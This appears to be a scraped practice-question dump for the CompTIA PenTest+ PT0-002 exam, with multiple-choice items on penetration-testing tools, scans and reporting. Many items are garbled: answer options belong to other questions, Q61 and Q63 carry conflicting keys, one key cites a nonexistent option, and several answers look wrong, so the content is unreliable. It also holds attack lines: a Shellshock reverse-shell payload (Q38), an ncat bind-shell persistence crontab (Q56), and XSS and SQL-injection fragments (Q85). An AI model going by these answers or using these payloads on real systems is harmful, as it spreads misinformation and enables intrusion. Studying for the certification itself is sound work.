
Latest CompTIA PenTest+ PT0-002 Exam Questions for Effective Preparation

Our extensive collection of exam questions and answers, carefully crafted test questions, and valuable exam resources are here to support your journey. Prepare with confidence using our comprehensive study materials, designed to cover all key topics tested in the exam. From penetration testing methodologies to vulnerability assessment and management, our resources are tailored to enhance your understanding and boost your exam readiness. Practice makes perfect, and our mock exams are the perfect tool to assess your knowledge and simulate the exam environment. Identify strengths and weaknesses, refine your skills, and approach exam day with confidence. With our expert guidance and top-notch study materials, you'll be well-equipped to pass the CompTIA PenTest+ PT0-002 exam and take your cybersecurity career to new heights. Start preparing today for a successful exam experience!

Question #1
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
View answer
Correct Answer: C
Question #2
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. Weak authentication schemes
B. Credentials stored in strings
C. Buffer overflows
D. Non-optimized resource management
View answer
Correct Answer: C
Question #3
Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)
A. Hydra
B. John the Ripper
C. Cain and Abel
D. Medusa
View answer
Correct Answer: BC
Question #4
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
C. nmap -sA -v -O 192
D. nmap -sS -O 192
View answer
Correct Answer: D
Question #5
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)
A. Spawned shells
B. Created user accounts
C. Server logs
D. Administrator accounts
E. Reboot system
F. ARP cache
View answer
Correct Answer: BC
Question #6
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
A. VRFY and EXPN
B. VRFY and TURN
C. EXPN and TURN
D. RCPT TO and VRFY
View answer
Correct Answer: A
Question #7
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. Run an application vulnerability scan and then identify the TCP ports used by the application
B. Run the application attached to a debugger and then review the application's log
C. Disassemble the binary code and then identify the break points
D. Start a packet capture with Wireshark and then run the application
View answer
Correct Answer: D
Question #8
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?
A. The penetration tester conducts a retest
B. The penetration tester deletes all scripts from the client machines
C. The client applies patches to the systems
D. The client clears system logs generated during the test
View answer
Correct Answer: C
Question #9
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
A. The team exploits a critical server within the organization
B. The team exfiltrates PII or credit card data from the organization
C. The team loses access to the network remotely
D. The team discovers another actor on a system on the network
View answer
Correct Answer: D
Question #10
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them
B. Scripts that are part of the framework can be imported directly into SIEM tools
C. The methodology can be used to estimate the cost of an incident better
D. The framework is static and ensures stability of a security program over time
View answer
Correct Answer: A
Question #11
Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?
A. Scope details
B. Findings
C. Methodology
D. Statement of work
View answer
Correct Answer: C
Question #12
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
View answer
Correct Answer: A
Question #13
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare
B. Perform a manual test on the server
C. Check the results on the scanner
D. Look for the vulnerability online
View answer
Correct Answer: B
Question #14
DRAG DROP (Drag and Drop is not supported) During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan. INSTRUCTIONS: Analyze the code segments to determine which sections are needed to complete a port scanning script. Drag the appropriate elements into the correct locations to complete the script. If at any time you would like to bring back the initial state of the simulation, please click the Re
A. See Explanation section for answer
View answer
Correct Answer: A
Question #15
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted store of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for
A. TCP port 443 is not open on the firewall
B. The API server is using SSL instead of TLS
C. The tester is using an outdated version of the application
D. The application has the API certificate pinned
View answer
Correct Answer: D
Question #16
A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?
A. Send an SMS with a spoofed service number including a link to download a malicious application
B. Exploit a vulnerability in the MDM and create a new account and device profile
C. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading
D. Infest a website that is often used by employees with malware targeted toward x86 architectures
View answer
Correct Answer: A
Question #17
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
View answer
Correct Answer: C
Question #18
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?
A. Socat
B. tcpdump
C. Scapy
D. dig
View answer
Correct Answer: C
Question #19
Which of the following would a company's hunt team be MOST interested in seeing in a final report?
A. Executive summary
B. Attack TTPs
C. Methodology
D. Scope details
View answer
Correct Answer: B
Question #20
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. Meta tagging
D. Tag nesting
View answer
Correct Answer: D
Question #21
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET
D. WPScan
View answer
Correct Answer: C
Question #22
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
View answer
Correct Answer: C
Question #23
A penetration tester writes the following script: Which of the following is the tester performing?
A. Searching for service vulnerabilities
B. Trying to recover a lost bind shell
C. Building a reverse shell listening on specified ports
D. Scanning a network for specific open ports
View answer
Correct Answer: D
Question #24
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?
A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng
View answer
Correct Answer: B
Question #25
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered
B. Identify all the vulnerabilities in the environment
C. Limit invasiveness based on scope
D. Maintain confidentiality of the findings
View answer
Correct Answer: B
Question #26
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
View answer
Correct Answer: B
Question #27
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
A. OpenVAS
B. Drozer
C. Burp Suite
D. OWASP ZAP
View answer
Correct Answer: A
Question #28
A penetration tester gains access to a system and establishes persistence, and then runs the following commands: Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
View answer
Correct Answer: C
Question #29
A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve?
A. Determine active hosts on the network
B. Set the TTL of ping packets for stealth
C. Fill the ARP table of the networked devices
D. Scan the system on the most used ports
View answer
Correct Answer: A
Question #31
A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?
A. Pick a lock
B. Disable the cameras remotely
C. Impersonate a package delivery worker
D. Send a phishing email
View answer
Correct Answer: C
Question #32
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results: The tester then runs the following command from the previous exploited system, which fails: Which of the following explains the reason why the command failed?
A. Active scanning
B. Ping sweep
C. Protocol reversing
D. Packet analysis
View answer
Correct Answer: A
Question #33
A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay
View answer
Correct Answer: B
Question #34
A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?
A. Terminate the contract
B. Update the ROE with new signatures
C. Scan the 8-bit block to map additional missed hosts
D. Continue the assessment
View answer
Correct Answer: B
Question #35
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?
A. Perform vertical privilege escalation
B. Replay the captured traffic to the server to recreate the session
C. Use John the Ripper to crack the password
D. Utilize a pass-the-hash attack
View answer
Correct Answer: D
Question #36
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
View answer
Correct Answer: AC
Question #37
A consultant is reviewing the following output after reports of intermittent connectivity issues: Which of the following is MOST likely to be reported by the consultant?
A. A device on the network has an IP address in the wrong subnet
B. A multicast session was initiated using the wrong multicast group
C. An ARP flooding attack is using the broadcast address to perform DDoS
D. A device on the network has poisoned the ARP cache
View answer
Correct Answer: D
Question #38
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml +xml,application/xml"}
B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml +xml,application/xml"}
C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml +xml,application/xml"}
D. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10
View answer
Correct Answer: A
Question #39
A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?
A. Gain access to the target host and implant malware specially crafted for this purpose
B. Exploit the local DNS server and add/update the zone records with a spoofed A record
C. Use the Scapy utility to overwrite name resolution fields in the DNS query response
D. Proxy HTTP connections from the target host to that of the spoofed host
View answer
Correct Answer: D
Question #40
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact
B. Try to take down the attackers
C. Call law enforcement officials immediately
D. Collect the proper evidence and add to the final report
View answer
Correct Answer: A
Question #41
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
View answer
Correct Answer: C
Question #42
A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?
A. Perform a new penetration test
B. Remediate the findings
C. Provide the list of common vulnerabilities and exposures
D. Broaden the scope of the penetration test
View answer
Correct Answer: A
Question #43
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. #
B. $
C. #
D. $
E. !
View answer
Correct Answer: E
Question #44
A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
View answer
Correct Answer: D
Question #45
A compliance-based penetration test is primarily concerned with:
A. Obtaining PII from the protected network
B. Bypassing protection on edge devices
C. Determining the efficacy of a specific set of security standards
D. Obtaining specific information from the protected network
View answer
Correct Answer: C
Question #46
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contract with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
A. Crawling the web application's URLs looking for vulnerabilities
B. Fingerprinting all the IP addresses of the application's servers
C. Brute forcing the application's passwords
D. Sending many web requests per second to test DDoS protection
View answer
Correct Answer: D
Question #47
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
A. ock
B. range(1, 1025) on line 1 populated the portList list in numerical order
C. Line 6 uses socket
D. The remoteSvr variable has neither been type-hinted nor initialized
View answer
Correct Answer: B
Question #48
Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?
A. MSA
B. NDA
C. SOW
D. ROE
View answer
Correct Answer: B
Question #49
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
View answer
Correct Answer: A
Question #50
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file?
A. echo U3VQZXIkM2NyZXQhCg== | base64 -d
B. tar zxvf password
C. hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192
D. john --wordlist /usr/share/seclists/rockyou
View answer
Correct Answer: A
Question #51
During an engagement, a penetration tester found the following list of strings inside a file: Which of the following is the BEST technique to determine the known plaintext of the strings?
A. Dictionary attack
B. Rainbow table attack
C. Brute-force attack
D. Credential-stuffing attack
View answer
Correct Answer: B
Question #52
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
A. nmap -P0 -T0 -sS 192
B. nmap -sA -sV --host-timeout 60 192
C. nmap -f --badsum 192
D. nmap -A -n 192
View answer
Correct Answer: AE
Question #53
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter, with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
A. Data flooding
B. Session riding
C. Cybersquatting
D. Side channel
View answer
Correct Answer: D
Question #54
A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
A. nmap -sn 192
B. nmap -sn 192
C. nmap -sn 192
D. nmap -sN 192
View answer
Correct Answer: B
Question #55
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
View answer
Correct Answer: C
Question #56
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic startup get caption,command
C. (crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
View answer
Correct Answer: C
Question #57
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
A. Nessus
B. Metasploit
C. Burp Suite
D. Ettercap
View answer
Correct Answer: B
Question #59
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
A. NIST SP 800-53
B. OWASP Top 10
C. MITRE ATT&CK framework
D. PTES technical guidelines
View answer
Correct Answer: C
Question #60
A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:
...
;; ANSWER SECTION
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com.
comptia.org. 3569 IN A 3.219.13.186.
comptia.org. 3569 IN NS ns1.comptia.org.
comptia.org. 3569 IN SOA haven. administrator.comptia.org.
comptia.org. 3569 IN MX new.mx0.comptia.org.
comptia.org. 3569 IN MX new.mx1.comptia.org.
Which of the following potential issues can the penetration tester identify based on this output?
A. At least one of the records is out of scope
B. There is a duplicate MX record
C. The NS record is not within the appropriate domain
D. The SOA records outside the comptia
View answer
Correct Answer: A
Question #61
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws
View answer
Correct Answer: A
Question #62
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan
B. The penetration tester used unsupported flags
C. The edge network device was disconnected
D. The scan returned ICMP echo replies
View answer
Correct Answer: A
Question #63
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws
View answer
Correct Answer: C
Question #64
An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
A. Look for open ports
B. Listen for a reverse shell
C. Attempt to flood open ports
D. Create an encrypted tunnel
View answer
Correct Answer: C
Question #65
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?
A. Nmap
B. Wireshark
C. Metasploit
D. Netcat
View answer
Correct Answer: B
Question #66
A penetration tester runs a scan against a server and obtains the following output: Which of the following command sequences should the penetration tester try NEXT?
A. ftp 192
B. smbclient \\\\WEB3\\IPC$ -I 192
C. ncrack -u Administrator -P 15worst_passwords
D. curl -X TRACE https://192
View answer
Correct Answer: A
Question #67
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
A. Stronger algorithmic requirements
B. Access controls on the server
C. Encryption on the user passwords
D. A patch management program
View answer
Correct Answer: A
Question #68
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
A. Launch an external scan of netblocks
B. Check WHOIS and netblock records for the company
C. Use DNS lookups and dig to determine the external hosts
D. Conduct a ping sweep of the company's netblocks
View answer
Correct Answer: B
Question #69
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
View answer
Correct Answer: B
Question #70
A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
A. Nessus
B. ProxyChains
C. OWASP ZAP
D. Empire
View answer
Correct Answer: B
Question #71
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
View answer
Correct Answer: B
Question #72
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. nmap -A -T4 -p80 192
D. nmap -O -v -p80 192
View answer
Correct Answer: C
Question #73
A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about
C. info
D. home
View answer
Correct Answer: B
Question #74
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
- Have a full TCP connection
- Send a `hello` payload
- Wait for a response
- Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
A. Run nmap -Pn -sV --script vuln
B. Employ an OpenVAS simple scan against the TCP port of the host
C. Create a script in the Lua language and use it with NSE
D. Perform a credentialed scan with Nessus
View answer
Correct Answer: C
Question #75
PCI DSS requires which of the following as part of the penetration-testing process?
A. The penetration tester must have cybersecurity certifications
B. The network must be segmented
C. Only externally facing systems should be tested
D. The assessment must be performed during non-working hours
View answer
Correct Answer: B
Question #76
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
View answer
Correct Answer: A
Question #77
A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer
View answer
Correct Answer: C
Question #78
A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running?
A. CentOS
B. Arch Linux
C. Windows Server
D. Ubuntu
View answer
Correct Answer: C
Question #79
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
A. Will reveal vulnerabilities in the Modbus protocol
B. May cause unintended failures in control systems
C. May reduce the true positive rate of findings
D. Will create a denial-of-service condition on the IP networks
View answer
Correct Answer: B
Question #80
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
A. Alternate data streams
B. PowerShell modules
C. MP4 steganography
D. ProcMon
View answer
Correct Answer: D
Question #81
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack?
A. WPS
B. WPA2-EAP
C. WPA-TKIP
D. WPA2-PSK
View answer
Correct Answer: A
Question #82
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing
B. Recommend using a password manager/vault instead of text files to store passwords securely
C. Recommend configuring password complexity rules in all the systems and applications
D. Document the unprotected file repository as a finding in the penetration-testing report
View answer
Correct Answer: D
Question #83
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
A. iam_enum_permissions
B. iam_privesc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions
View answer
Correct Answer: A
Question #84
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?
A. Nmap
B. Nikto
C. Cain and Abel
D. Ettercap
View answer
Correct Answer: B
Question #85
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
A. <script>var adr = '
B.
C. /var/www/html/index
D. UNION SELECT 1, DATABASE (), 3 --
View answer
Correct Answer: C